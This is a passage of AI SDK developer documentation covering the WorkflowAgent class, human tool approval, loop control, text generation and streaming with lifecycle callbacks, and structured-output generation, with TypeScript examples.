Stream output	`streamText` return value	`writable` parameter with `ModelCallStreamPart`

For simpler use cases that don't need durability, use ToolLoopAgent from the ai package.

Installation

npm install @ai-sdk/workflow workflow

@ai-sdk/workflow requires the ai package and zod as peer dependencies. The workflow package provides the Workflow DevKit runtime (getWritable, 'use workflow', 'use step').

Creating a WorkflowAgent

Define an agent by instantiating the WorkflowAgent class with a model, instructions, and tools:

import { WorkflowAgent } from "@ai-sdk/workflow";
import { tool } from "ai";
import { z } from "zod";

const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",
  instructions: "You are a helpful assistant.",
  tools: {
    weather: tool({
      description: "Get weather for a location",
      inputSchema: z.object({
        location: z.string(),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72,
      }),
    }),
  },
});

Model Resolution

The model parameter accepts two forms:

// String — AI Gateway model ID
new WorkflowAgent({ model: "anthropic/claude-sonnet-4-6" });

// Provider instance
import { openai } from "@ai-sdk/openai";
new WorkflowAgent({ model: openai("gpt-4o") });

Using the Agent in a Workflow

WorkflowAgent is designed to run inside a workflow function. The key integration points are:

Mark your function with 'use workflow'
Pass getWritable() to the agent's stream() method
Start the workflow from your API route

End-to-End Example

import { WorkflowAgent, type ModelCallStreamPart } from "@ai-sdk/workflow";
import { convertToModelMessages, tool, type UIMessage } from "ai";
import { getWritable } from "workflow";
import { z } from "zod";

export async function chat(messages: UIMessage[]) {
  "use workflow";

  const modelMessages = await convertToModelMessages(messages);

  const agent = new WorkflowAgent({
    model: "anthropic/claude-sonnet-4-6",
    instructions: "You are a flight booking assistant.",
    tools: {
      searchFlights: tool({
        description: "Search for available flights",
        inputSchema: z.object({
          origin: z.string(),
          destination: z.string(),
          date: z.string(),
        }),
        execute: searchFlightsStep,
      }),
      bookFlight: tool({
        description: "Book a specific flight",
        inputSchema: z.object({
          flightId: z.string(),
          passengerName: z.string(),
        }),
        execute: bookFlightStep,
      }),
    },
  });

  const result = await agent.stream({
    messages: modelMessages,
    writable: getWritable<ModelCallStreamPart>(),
  });

  return { messages: result.messages };
}

import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse, type UIMessage } from "ai";
import { start } from "workflow/api";
import { chat } from "@/workflow/agent-chat";

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const run = await start(chat, [messages]);

  return createUIMessageStreamResponse({
    stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
  });
}

Message Conversion

WorkflowAgent.stream() expects ModelMessage[], not UIMessage[]. When receiving messages from the client (via useChat), convert them first:

import { convertToModelMessages, type UIMessage } from "ai";

export async function chat(messages: UIMessage[]) {
  "use workflow";

  const modelMessages = await convertToModelMessages(messages);

  const result = await agent.stream({
    messages: modelMessages,
    // ...
  });
}

Writable Streams

Unlike ToolLoopAgent where you consume the returned stream, WorkflowAgent writes raw ModelCallStreamPart chunks to a writable stream provided by the workflow runtime via getWritable(). At the response boundary, use createModelCallToUIChunkTransform() to convert these into UIMessageChunk objects for the client:

import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse } from "ai";

// Convert raw model stream parts → UI message chunks
return createUIMessageStreamResponse({
  stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});

Resumable Streaming with WorkflowChatTransport

Workflow functions can time out or be interrupted by network failures. WorkflowChatTransport is a ChatTransport implementation that handles these interruptions automatically — it detects when a stream ends without a finish event and reconnects to resume from where it left off.

"use client";

import { useChat } from "@ai-sdk/react";
import { WorkflowChatTransport } from "@ai-sdk/workflow";
import { useMemo } from "react";

export default function Chat() {
  const transport = useMemo(
    () =>
      new WorkflowChatTransport({
        api: "/api/chat",
        maxConsecutiveErrors: 5,
        initialStartIndex: -50, // On page refresh, fetch last 50 chunks
      }),
    [],
  );

  const { messages, sendMessage } = useChat({ transport });

  // ... render chat UI
}

The transport requires your POST endpoint to return an x-workflow-run-id response header, and a GET endpoint at {api}/{runId}/stream for reconnection:

import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse, type UIMessage } from "ai";
import { start } from "workflow/api";
import { chat } from "@/workflow/agent-chat";

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();
  const run = await start(chat, [messages]);

  return createUIMessageStreamResponse({
    stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
    headers: {
      "x-workflow-run-id": run.runId,
    },
  });
}

import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import type { NextRequest } from "next/server";
import { getRun } from "workflow/api";

export async function GET(
  request: NextRequest,
  { params }: { params: Promise<{ runId: string }> },
) {
  const { runId } = await params;
  const startIndex = Number(
    new URL(request.url).searchParams.get("startIndex") ?? "0",
  );

  const run = await getRun(runId);
  const readable = run
    .getReadable({ startIndex })
    .pipeThrough(createModelCallToUIChunkTransform());

  return new Response(readable, {
    headers: {
      "Content-Type": "text/event-stream",
      "Cache-Control": "no-cache",
      Connection: "keep-alive",
      "x-workflow-run-id": runId,
    },
  });
}

For the full API reference, see WorkflowChatTransport.

Tools as Workflow Steps

Mark tool execute functions with 'use step' to make them durable workflow steps. This gives each tool call:

Automatic retries — Failed tool calls are retried automatically (default: 3 attempts)
Persistence — Results survive process restarts
Observability — Each tool call appears as a discrete step in the workflow dashboard

async function searchFlightsStep(input: {
  origin: string;
  destination: string;
  date: string;
}) {
  "use step";
  const response = await fetch(`https://api.flights.example/search?...`);
  return response.json();
}

async function bookFlightStep(input: {
  flightId: string;
  passengerName: string;
}) {
  "use step";
  const response = await fetch("https://api.flights.example/book", {
    method: "POST",
    body: JSON.stringify(input),
  });
  return response.json();
}

Tools without 'use step' still work but run as regular in-memory functions without durability guarantees.

Tool Approval

Tools can require human approval before execution. When a tool has needsApproval set, the agent pauses and emits an approval request to the writable stream. The workflow suspends until the user approves or denies:

const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",
  tools: {
    bookFlight: tool({
      description: "Book a flight",
      inputSchema: z.object({
        flightId: z.string(),
        passengerName: z.string(),
      }),
      needsApproval: true, // Always require approval
      execute: bookFlightStep,
    }),
    cancelBooking: tool({
      description: "Cancel a booking",
      inputSchema: z.object({ bookingId: z.string() }),
      // Conditional approval based on input
      needsApproval: async (input) => {
        return input.bookingId.startsWith("VIP-");
      },
      execute: cancelBookingStep,
    }),
  },
});

Because the workflow is durable, the approval request survives process restarts — the user can approve hours later and the agent will resume.

Loop Control

Control how many steps the agent can take:

import { isStepCount } from "ai";

const result = await agent.stream({
  messages,
  stopWhen: isStepCount(10), // Stop after 10 LLM calls
});

If you want the agent to keep running until it has finished calling tools, you can also use isLoopFinished():

import { isLoopFinished } from "ai";

const result = await agent.stream({
  messages,
  stopWhen: isLoopFinished(),
});

isLoopFinished() lets the agent run until all tool calls have completed, but you should still pair it with maxSteps to avoid runaway loops. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.

By default, the agent loops until the model stops calling tools (no maximum).

Structured Output

Parse agent responses into typed objects using Output:

import { Output } from "@ai-sdk/workflow";
import { z } from "zod";

const result = await agent.stream({
  messages,
  output: Output.object({
    schema: z.object({
      sentiment: z.enum(["positive", "neutral", "negative"]),
      summary: z.string(),
    }),
  }),
});

console.log(result.output); // { sentiment: 'positive', summary: '...' }

Configuration Options

WorkflowAgent accepts the same generation settings as ToolLoopAgent (temperature, maxOutputTokens, topP, etc.) plus workflow-specific options.

prepareCall

Called once before the agent loop starts. Use it to transform model, instructions, or other settings based on runtime context:

const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",
  prepareCall: async ({ model, tools, messages }) => {
    return {
      instructions: `Current time: ${new Date().toISOString()}`,
    };
  },
});

prepareStep

Called before each step (LLM call). Use it to modify settings, manage context, or inject messages dynamically:

const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",
  prepareStep: async ({ stepNumber, messages }) => {
    if (stepNumber > 5) {
      return { toolChoice: "none" }; // Force text response after 5 steps
    }
    return {};
  },
});

Both prepareCall and prepareStep can also be passed per-call in stream().

Lifecycle Callbacks

Agents provide lifecycle callbacks for logging, observability, and custom telemetry. All callbacks can be defined in the constructor (agent-wide) or in stream() (per-call). When both are provided, both fire (constructor first):

const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",

  experimental_onStart({ model, messages }) {
    console.log("Agent started");
  },

  experimental_onStepStart({ stepNumber }) {
    console.log(`Step ${stepNumber} starting`);
  },

  experimental_onToolExecutionStart({ toolCall }) {
    console.log(`Calling tool: ${toolCall.toolName}`);
  },

  experimental_onToolExecutionEnd({ toolCall, result, error }) {
    console.log(`Tool finished: ${toolCall.toolName}`);
  },

  onStepFinish({ usage, finishReason }) {
    console.log("Step done:", { finishReason });
  },

  onFinish({ steps, totalUsage }) {
    console.log(`Completed in ${steps.length} steps`);
  },
});

Type Inference

Infer the UI message type for type-safe client components:

import { WorkflowAgent, InferWorkflowAgentUIMessage } from "@ai-sdk/workflow";

const myAgent = new WorkflowAgent({
  // ... configuration
});

export type MyAgentUIMessage = InferWorkflowAgentUIMessage<typeof myAgent>;

Next Steps

WorkflowAgent API Reference for detailed parameter documentation
WorkflowChatTransport API Reference for stream reconnection options
Building Agents for the in-memory ToolLoopAgent alternative
Loop Control for advanced stop conditions

title: Agents description: An overview of building agents with the AI SDK.

Agents

The following section shows you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.

title: Overview description: An overview of AI SDK Core.

AI SDK Core

For example, here’s how you can generate text with various models using the AI SDK:

AI SDK Core Functions

generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.

API Reference

Please check out the AI SDK Core API Reference for more details on each function.

title: Generating Text description: Learn how to generate text with the AI SDK.

Generating and Streaming Text

The AI SDK Core provides two functions to generate text and stream it from LLMs:

generateText: Generates text for a given prompt and model.
streamText: Streams text from a given prompt and model.

Advanced LLM features such as tool calling and structured data generation are built on top of text generation.

`generateText`

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can use more advanced prompts to generate text with more complex instructions and content:

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  system:
    'You are a professional writer. ' +
    'You write simple, clear, and concise content.',
  prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});

The result object of generateText contains several promises that resolve when all required data is available:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated in the last step.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: The files that were generated in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that were made in the last step.
result.toolResults: The results of the tool calls from the last step.
result.finishReason: The reason the model finished generating text.
result.rawFinishReason: The raw reason why the generation finished (from the provider).
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.request: Additional request information.
result.response: Additional response information, including response messages and body.
result.providerMetadata: Additional provider-specific metadata.
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.output: The generated structured output using the output specification.

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText } from 'ai';

const result = await generateText({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

`onFinish` callback

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

Lifecycle callbacks (experimental)

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // ... your tools
  },

  experimental_onStart({ model, settings, functionId }) {
    console.log('Generation started', { model, functionId });
  },

  experimental_onStepStart({ stepNumber, model, promptMessages }) {
    console.log(`Step ${stepNumber} starting`, { model: model.modelId });
  },

  experimental_onToolExecutionStart({ toolName, toolCallId, input }) {
    console.log(`Tool call starting: ${toolName}`, { toolCallId });
  },

  experimental_onToolExecutionEnd({ toolName, durationMs, error }) {
    console.log(`Tool call finished: ${toolName} (${durationMs}ms)`, {
      success: !error,
    });
  },

  onStepFinish({ stepNumber, finishReason, usage }) {
    console.log(`Step ${stepNumber} finished`, { finishReason, usage });
  },
});

The available lifecycle callbacks are:

experimental_onStart: Called once when the generateText operation begins, before any LLM calls. Receives model info, prompt, settings, and runtimeContext.
experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, prompt messages being sent, tools, and prior steps.
experimental_onToolExecutionStart: Called right before a tool's execute function runs. Receives the tool name, call ID, and input.
experimental_onToolExecutionEnd: Called right after a tool's execute function completes or errors. Receives the tool name, call ID, input, output (or undefined on error), error (or undefined on success), and durationMs.
onStepFinish: Called after each step finishes. Now also includes stepNumber (zero-based index of the completed step).

`streamText`

AI SDK Core provides the streamText function which simplifies streaming text from LLMs:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
});

// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
  console.log(textPart);
}

You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC. The result object contains several helper functions to make the integration into AI SDK UI easier:

result.toUIMessageStreamResponse(): Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
result.pipeUIMessageStreamToResponse(): Writes UI Message stream delta output to a Node.js response-like object.
result.toTextStreamResponse(): Creates a simple text stream HTTP response.
result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.

It also provides several promises that resolve when the stream is finished:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: Files that have been generated by the model in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that have been executed in the last step.
result.toolResults: The tool results that have been generated in the last step.
result.finishReason: The reason the model finished generating text.
result.rawFinishReason: The raw reason why the generation finished (from the provider).
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.request: Additional request information from the last step.
result.response: Additional response information from the last step.
result.providerMetadata: Additional provider-specific metadata from the last step.

`onError` callback

streamText immediately starts streaming to enable sending data without waiting for the model. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

`onChunk` callback

When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.

It receives the following chunk types:

text
reasoning
source
tool-call
tool-input-start
tool-input-delta
tool-result
raw

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onChunk({ chunk }) {
    // implement your own logic here, e.g.:
    if (chunk.type === 'text') {
      console.log(chunk.text);
    }
  },
});

`onFinish` callback

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

Lifecycle callbacks (experimental)

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // ... your tools
  },

  experimental_onStart({ model, system, prompt, messages }) {
    console.log('Streaming started', { model, prompt });
  },

  experimental_onStepStart({ stepNumber, model, messages }) {
    console.log(`Step ${stepNumber} starting`, { model: model.modelId });
  },

  experimental_onToolExecutionStart({ toolCall }) {
    console.log(`Tool call starting: ${toolCall.toolName}`, {
      toolCallId: toolCall.toolCallId,
    });
  },

  experimental_onToolExecutionEnd({ toolCall, durationMs, success, error }) {
    console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
      success,
    });
  },

  onStepFinish({ finishReason, usage }) {
    console.log('Step finished', { finishReason, usage });
  },
});

The available lifecycle callbacks are:

experimental_onStart: Called once when the streamText operation begins, before any LLM calls. Receives model info, prompt, settings, and runtimeContext.
experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
experimental_onToolExecutionStart: Called right before a tool's execute function runs. Receives the tool call object, messages, and the tool-specific context for that call.
experimental_onToolExecutionEnd: Called right after a tool's execute function completes or errors. Receives the tool call object, durationMs, and a discriminated union with success/output or success/error.
onStepFinish: Called after each step finishes. Receives the finish reason, usage, and other step details.

`fullStream` property

import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    cityAttractions: {
      inputSchema: z.object({ city: z.string() }),
      execute: async ({ city }) => ({
        attractions: ['attraction1', 'attraction2', 'attraction3'],
      }),
    },
  },
  prompt: 'What are some San Francisco tourist attractions?',
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'start': {
      // handle start of stream
      break;
    }
    case 'start-step': {
      // handle start of step
      break;
    }
    case 'text-start': {
      // handle text start
      break;
    }
    case 'text-delta': {
      // handle text delta here
      break;
    }
    case 'text-end': {
      // handle text end
      break;
    }
    case 'reasoning-start': {
      // handle reasoning start
      break;
    }
    case 'reasoning-delta': {
      // handle reasoning delta here
      break;
    }
    case 'reasoning-end': {
      // handle reasoning end
      break;
    }
    case 'source': {
      // handle source here
      break;
    }
    case 'file': {
      // handle file here
      break;
    }
    case 'tool-call': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool call here
          break;
        }
      }
      break;
    }
    case 'tool-input-start': {
      // handle tool input start
      break;
    }
    case 'tool-input-delta': {
      // handle tool input delta
      break;
    }
    case 'tool-input-end': {
      // handle tool input end
      break;
    }
    case 'tool-result': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool result here
          break;
        }
      }
      break;
    }
    case 'tool-error': {
      // handle tool error
      break;
    }
    case 'finish-step': {
      // handle finish step
      break;
    }
    case 'finish': {
      // handle finish here
      break;
    }
    case 'error': {
      // handle error here
      break;
    }
    case 'raw': {
      // handle raw value
      break;
    }
  }
}

Stream transformation

You can use the experimental_transform option to transform the stream. This is useful for e.g. filtering, changing, or smoothing the text stream.

Smoothing streams

The AI SDK Core provides a smoothStream function that can be used to smooth out text and reasoning streaming.

import { smoothStream, streamText } from 'ai';

const result = streamText({
  model,
  prompt,
  experimental_transform: smoothStream(),
});

Custom transformations

Here is an example of how to implement a custom transformation that converts all text to uppercase:

import { streamText, type TextStreamPart, type ToolSet } from 'ai';

const upperCaseTransform =
  <TOOLS extends ToolSet>() =>
  (options: { tools: TOOLS; stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      transform(chunk, controller) {
        controller.enqueue(
          // for text-delta chunks, convert the text to uppercase:
          chunk.type === 'text-delta'
            ? { ...chunk, text: chunk.text.toUpperCase() }
            : chunk,
        );
      },
    });

You can also stop the stream using the stopStream function. This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.

When you invoke stopStream, it is important to simulate the finish-step and finish events to guarantee that a well-formed stream is returned and all callbacks are invoked.

import { streamText, type TextStreamPart, type ToolSet } from 'ai';

const stopWordTransform =
  <TOOLS extends ToolSet>() =>
  ({ stopStream }: { stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      // note: this is a simplified transformation for testing;
      // in a real-world version more there would need to be
      // stream buffering and scanning to correctly emit prior text
      // and to detect all STOP occurrences.
      transform(chunk, controller) {
        if (chunk.type !== 'text-delta') {
          controller.enqueue(chunk);
          return;
        }

        if (chunk.text.includes('STOP')) {
          // stop the stream
          stopStream();

          // simulate the finish-step event
          controller.enqueue({
            type: 'finish-step',
            finishReason: 'stop',
            rawFinishReason: 'stop',
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
            providerMetadata: undefined,
          });

          // simulate the finish event
          controller.enqueue({
            type: 'finish',
            finishReason: 'stop',
            rawFinishReason: 'stop',
            totalUsage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
          });

          return;
        }

        controller.enqueue(chunk);
      },
    });

Multiple transformations

You can also provide multiple transformations. They are applied in the order they are provided.

const result = streamText({
  model,
  prompt,
  experimental_transform: [firstTransform, secondTransform],
});

Sources

Some providers such as Perplexity and Google include sources in the response.

Currently sources are limited to web pages that ground the response. You can access them using the sources property of the result.

Each url source contains the following properties:

id: The ID of the source.
url: The URL of the source.
title: The optional title of the source.
providerMetadata: Provider metadata for the source.

When you use generateText, you can access the sources using the sources property:

const result = await generateText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for (const source of result.sources) {
  if (source.sourceType === 'url') {
    console.log('ID:', source.id);
    console.log('Title:', source.title);
    console.log('URL:', source.url);
    console.log('Provider metadata:', source.providerMetadata);
    console.log();
  }
}

When you use streamText, you can access the sources using the fullStream property:

const result = streamText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for await (const part of result.fullStream) {
  if (part.type === 'source' && part.sourceType === 'url') {
    console.log('ID:', part.id);
    console.log('Title:', part.title);
    console.log('URL:', part.url);
    console.log('Provider metadata:', part.providerMetadata);
    console.log();
  }
}

The sources are also available in the result.sources promise.

Examples

You can see generateText and streamText in action using various frameworks in the following examples:

`generateText`

`streamText`

title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.

Generating Structured Data

Generating Structured Outputs

Use generateText with Output.object() to generate structured data from a prompt. The schema is also used to validate the generated data, ensuring type safety and correctness.

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText, Output } from 'ai';

const result = await generateText({
  // ...
  output: Output.object({ schema }),
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

Stream Structured Outputs

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { partialOutputStream } = streamText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

// use partialOutputStream as an async iterable
for await (const partialObject of partialOutputStream) {
  console.log(partialObject);
}

You can consume the structured output on the client with the useObject hook.

Error Handling in Streams

streamText starts streaming immediately. When errors occur during streaming, they become part of the stream rather than thrown exceptions (to prevent stream crashes).

To handle errors, provide an onError callback:

import { streamText, Output } from 'ai';

const result = streamText({
  // ...
  output: Output.object({ schema }),
  onError({ error }) {
    console.error(error); // log to your error tracking service
  },
});

For non-streaming error handling with generateText, see the Error Handling section below.

Output Types

The AI SDK supports multiple ways of specifying the expected structure of generated data via the Output object. You can select from various strategies for structured/text generation and validation.

`Output.text()`

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.text(),
  prompt: 'Tell me a joke.',
});
// output will be a string (the joke)

`Output.object()`

Use Output.object({ schema }) to generate a structured object based on a schema (for example, a Zod schema). The output is type-validated to ensure the returned result matches the schema.

import { generateText, Output } from 'ai';
import { z } from 'zod';

const { output } = await generateText({
  // ...
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable(),
      labels: z.array(z.string()),
    }),
  }),
  prompt: 'Generate information for a test user.',
});
// output will be an object matching the schema above

`Output.array()`

Use Output.array({ element }) to specify that you expect an array of typed objects from the model, where each element should conform to a schema (defined in the element property).

import { generateText, Output } from 'ai';
import { z } from 'zod';

const { output } = await generateText({
  // ...
  output: Output.array({
    element: z.object({
      location: z.string(),
      temperature: z.number(),
      condition: z.string(),
    }),
  }),
  prompt: 'List the weather for San Francisco and Paris.',
});
// output will be an array of objects like:
// [
//   { location: 'San Francisco', temperature: 70, condition: 'Sunny' },
//   { location: 'Paris', temperature: 65, condition: 'Cloudy' },
// ]

When streaming arrays with streamText, you can use elementStream to receive each completed element as it is generated:

import { streamText, Output } from 'ai';
import { z } from 'zod';

const { elementStream } = streamText({
  // ...
  output: Output.array({
    element: z.object({
      name: z.string(),
      class: z.string(),
      description: z.string(),
    }),
  }),
  prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});

for await (const hero of elementStream) {
  console.log(hero); // Each hero is complete and validated
}

`Output.choice()`

Use Output.choice({ options }) when you expect the model to choose from a specific set of string options, such as for classification or fixed-enum answers.

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.choice({
    options: ['sunny', 'rainy', 'snowy'],
  }),
  prompt: 'Is the weather sunny, rainy, or snowy today?',
});
// output will be one of: 'sunny', 'rainy', or 'snowy'

This is especially useful for making classification-style generations or forcing valid values for API compatibility.

`Output.json()`

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.json(),
  prompt:
    'For each city, return the current temperature and weather condition as a JSON object.',
});

// output could be any valid JSON, for example:
// {
//   "San Francisco": { "temperature": 70, "condition": "Sunny" },
//   "Paris": { "temperature": 65, "condition": "Cloudy" }
// }

For more advanced validation or different structures, see the Output API reference.

Generating Structured Outputs with Tools

One of the key advantages of using structured output with generateText and streamText is the ability to combine it with tool calling.

import { generateText, Output, tool, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather for a location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => {
        // fetch weather data
        return { temperature: 72, condition: 'sunny' };
      },
    }),
  },
  output: Output.object({
    schema: z.object({
      summary: z.string(),
      recommendation: z.string(),
    }),
  }),
  stopWhen: isStepCount(5),
  prompt: 'What should I wear in San Francisco today?',
});

Property Descriptions

You can add .describe("...") to individual schema properties to give the model hints about what each property is for. This helps improve the quality and accuracy of generated structured data:

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      name: z.string().describe('The name of the recipe'),
      ingredients: z
        .array(
          z.object({
            name: z.string(),
            amount: z
              .string()
              .describe('The amount of the ingredient (grams or ml)'),
          }),
        )
        .describe('List of ingredients with amounts'),
      steps: z.array(z.string()).describe('Step-by-step cooking instructions'),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Property descriptions are particularly useful for:

Clarifying ambiguous property names
Specifying expected formats or conventions
Providing context for complex nested structures

Output Name and Description

You can optionally specify a name and description for the output. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    name: 'Recipe',
    description: 'A recipe for a dish.',
    schema: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This works with all output types that support structured generation:

Output.object({ name, description, schema })
Output.array({ name, description, element })
Output.choice({ name, description, options })
Output.json({ name, description })

Accessing Reasoning

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = await generateText({
  model: __MODEL__, // must be a reasoning model
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({
            name: z.string(),
            amount: z.string(),
          }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(result.reasoningText);

Error Handling

When generateText with structured output cannot generate a valid object, it throws a AI_NoObjectGeneratedError.

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

The error preserves the following information to help you log the issue:

text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

import { generateText, Output, NoObjectGeneratedError } from 'ai';

try {
  await generateText({
    model,
    output: Output.object({ schema }),
    prompt,
  });
} catch (error) {
